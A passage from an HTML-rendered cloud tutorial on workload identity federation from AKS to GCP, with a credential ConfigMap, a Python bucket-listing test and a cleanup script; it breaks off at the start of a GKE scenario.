      &lt;span class="na"&gt;projected&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;sources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;serviceAccountToken&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
              &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-identity-token&lt;/span&gt;
              &lt;span class="na"&gt;expirationSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3600&lt;/span&gt;
              &lt;span class="na"&gt;audience&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;//iam.googleapis.com/projects/YOUR_PROJECT_NUMBER/locations/global/workloadIdentityPools/aks-pool/providers/aks-provider"&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-workload-identity-config-aks&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;config.json&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;{&lt;/span&gt;
      &lt;span class="s"&gt;"type": "external_account",&lt;/span&gt;
      &lt;span class="s"&gt;"audience": "//iam.googleapis.com/projects/YOUR_PROJECT_NUMBER/locations/global/workloadIdentityPools/aks-pool/providers/aks-provider",&lt;/span&gt;
      &lt;span class="s"&gt;"subject_token_type": "urn:ietf:params:oauth:token-type:jwt",&lt;/span&gt;
      &lt;span class="s"&gt;"token_url": "https://sts.googleapis.com/v1/token",&lt;/span&gt;
      &lt;span class="s"&gt;"service_account_impersonation_url": "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/aks-gcp-sa@YOUR_PROJECT_ID.iam.gserviceaccount.com:generateAccessToken",&lt;/span&gt;
      &lt;span class="s"&gt;"credential_source": {&lt;/span&gt;
        &lt;span class="s"&gt;"file": "/var/run/secrets/azure/tokens/azure-identity-token"&lt;/span&gt;
      &lt;span class="s"&gt;}&lt;/span&gt;
    &lt;span class="s"&gt;}&lt;/span&gt;
&lt;span class="s"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-test-code-aks&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;test_gcp_from_aks.py&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;# Code below&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Test Code (Python):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# test_gcp_from_aks.py
&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;google.auth&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;default&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;google.cloud&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;storage&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_gcp_access&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;credentials&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;project&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;default&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="n"&gt;storage_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;storage&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;Client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;credentials&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;credentials&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;project&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;GCP_PROJECT_ID&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="n"&gt;buckets&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;storage_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;list_buckets&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_results&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;GCP Authentication successful!&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Found &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;buckets&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; GCS buckets:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;bucket&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;buckets&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  - &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;bucket&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;Authenticated with project: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;project&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;

    &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;GCP Authentication failed: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;traceback&lt;/span&gt;
        &lt;span class="n"&gt;traceback&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;print_exc&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;test_gcp_access&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Success logs:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you see logs like below for the pods &lt;code&gt;kubectl logs -f -n default aks-gcp-test&lt;/code&gt;, it means the AKS to GCP Authentication worked.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;GCP Authentication successful!
Found &amp;lt;number of buckets&amp;gt; GCS buckets:
  - bucket-1
  - bucket-2
  - aks-cross-cloud
  - ...

Authenticated with project: None
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h3&gt;
  
  
  Scenario 2 Cleanup
&lt;/h3&gt;

&lt;p&gt;After testing Scenario 2 (AKS cross-cloud authentication), clean up the resources:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# Azure Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="nv"&gt;RESOURCE_GROUP&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"my-aks-rg"&lt;/span&gt;
&lt;span class="nv"&gt;IDENTITY_NAME&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"aks-cross-cloud-identity"&lt;/span&gt;

&lt;span class="c"&gt;# Get managed identity client ID&lt;/span&gt;
&lt;span class="nv"&gt;CLIENT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az identity show &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; &lt;span class="nv"&gt;$IDENTITY_NAME&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; &lt;span class="nv"&gt;$RESOURCE_GROUP&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; clientId &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Delete role assignments&lt;/span&gt;
&lt;span class="nv"&gt;SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az account show &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="nb"&gt;id&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;
az role assignment delete &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assignee&lt;/span&gt; &lt;span class="nv"&gt;$CLIENT_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--scope&lt;/span&gt; &lt;span class="s2"&gt;"/subscriptions/&lt;/span&gt;&lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# Delete federated credential&lt;/span&gt;
az identity federated-credential delete &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; aks-federated-credential &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--identity-name&lt;/span&gt; &lt;span class="nv"&gt;$IDENTITY_NAME&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; &lt;span class="nv"&gt;$RESOURCE_GROUP&lt;/span&gt;

&lt;span class="c"&gt;# Delete managed identity&lt;/span&gt;
az identity delete &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; &lt;span class="nv"&gt;$IDENTITY_NAME&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; &lt;span class="nv"&gt;$RESOURCE_GROUP&lt;/span&gt;

&lt;span class="c"&gt;# Delete storage account&lt;/span&gt;
az storage account delete &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; akscrosscloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; &lt;span class="nv"&gt;$RESOURCE_GROUP&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--yes&lt;/span&gt;

&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# AWS Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="c"&gt;# Get OIDC provider ARN&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az aks show &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; &lt;span class="nv"&gt;$RESOURCE_GROUP&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; my-aks-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"oidcIssuerProfile.issuerUrl"&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$OIDC_ISSUER&lt;/span&gt; | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s2"&gt;"s/^https:&lt;/span&gt;&lt;span class="se"&gt;\/\/&lt;/span&gt;&lt;span class="s2"&gt;//"&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Delete IAM role policy attachments&lt;/span&gt;
aws iam detach-role-policy &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role-name&lt;/span&gt; aks-to-aws-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--policy-arn&lt;/span&gt; arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess

&lt;span class="c"&gt;# Delete IAM role&lt;/span&gt;
aws iam delete-role &lt;span class="nt"&gt;--role-name&lt;/span&gt; aks-to-aws-role

&lt;span class="c"&gt;# Delete OIDC provider&lt;/span&gt;
&lt;span class="nv"&gt;ACCOUNT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;aws sts get-caller-identity &lt;span class="nt"&gt;--query&lt;/span&gt; Account &lt;span class="nt"&gt;--output&lt;/span&gt; text&lt;span class="si"&gt;)&lt;/span&gt;
aws iam delete-open-id-connect-provider &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--open-id-connect-provider-arn&lt;/span&gt; &lt;span class="s2"&gt;"arn:aws:iam::&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;ACCOUNT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;:oidc-provider/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# GCP Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud config get-value project&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud projects describe &lt;span class="nv"&gt;$PROJECT_ID&lt;/span&gt; &lt;span class="nt"&gt;--format&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"value(projectNumber)"&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"aks-gcp-sa@&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;.iam.gserviceaccount.com"&lt;/span&gt;

&lt;span class="c"&gt;# Remove IAM policy binding&lt;/span&gt;
gcloud iam service-accounts remove-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;roles/iam.workloadIdentityUser &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"principalSet://iam.googleapis.com/projects/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/locations/global/workloadIdentityPools/aks-pool/attribute.service_account/system:serviceaccount:default:aks-cross-cloud-sa"&lt;/span&gt;

gcloud iam service-accounts remove-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;roles/iam.serviceAccountTokenCreator &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"principalSet://iam.googleapis.com/projects/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/locations/global/workloadIdentityPools/aks-pool/attribute.service_account/system:serviceaccount:default:aks-cross-cloud-sa"&lt;/span&gt;

&lt;span class="c"&gt;# Remove GCS bucket permissions (if you granted any)&lt;/span&gt;
gsutil iam ch &lt;span class="nt"&gt;-d&lt;/span&gt; serviceAccount:&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;:objectViewer gs://aks-cross-cloud

gcloud projects remove-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"serviceAccount:&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"roles/storage.admin"&lt;/span&gt;

&lt;span class="c"&gt;# Delete GCP service account&lt;/span&gt;
gcloud iam service-accounts delete &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="nt"&gt;--quiet&lt;/span&gt;

&lt;span class="c"&gt;# Delete workload identity provider&lt;/span&gt;
gcloud iam workload-identity-pools providers delete aks-provider &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;global &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--workload-identity-pool&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;aks-pool &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--quiet&lt;/span&gt;

&lt;span class="c"&gt;# Delete workload identity pool&lt;/span&gt;
gcloud iam workload-identity-pools delete aks-pool &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;global &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--quiet&lt;/span&gt;

&lt;span class="c"&gt;# Delete gcp bucket&lt;/span&gt;
gcloud storage buckets delete gs://aks-cross-cloud &lt;span class="nt"&gt;--quiet&lt;/span&gt;

&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# Kubernetes Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="c"&gt;# Delete test pods&lt;/span&gt;
kubectl delete pod aks-azure-test &lt;span class="nt"&gt;--force&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete pod aks-aws-test &lt;span class="nt"&gt;--force&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete pod aks-gcp-test &lt;span class="nt"&gt;--force&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;

&lt;span class="c"&gt;# Delete ConfigMaps&lt;/span&gt;
kubectl delete configmap azure-test-code-aks &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete configmap aws-test-code-aks &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete configmap gcp-workload-identity-config-aks &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete configmap gcp-test-code-aks &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;

&lt;span class="c"&gt;# Delete service account&lt;/span&gt;
kubectl delete serviceaccount aks-cross-cloud-sa &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  Scenario 3: Pods Running in GKE
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; After completing this scenario, make sure to clean up the resources using the cleanup steps at the end of this section.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Architecture Overview
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyl6hcmmape278xg4xr1s.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyl6hcmmape278xg4xr1s.png" alt="gke" width="800" height="495"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 Authenticating to GCP (Native Workload Identity)
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Important:&lt;/strong&gt; In GKE native Workload Identity, Google handles token exchange automatically. No projected token or external_account JSON is required—this is a key difference from EKS/AKS cross-cloud scenarios.&lt;br&gt;
&lt;strong&gt;Setup Steps:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;
&lt;/blockquote&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1. Enable Workload Identity on GKE cluster (if not already enabled), in our case we did so we can skip this&lt;/span&gt;
&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud config get-value project&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="c"&gt;#gcloud container clusters update my-gke-cluster \&lt;/span&gt;
&lt;span class="c"&gt;#  --region=us-central1 \&lt;/span&gt;
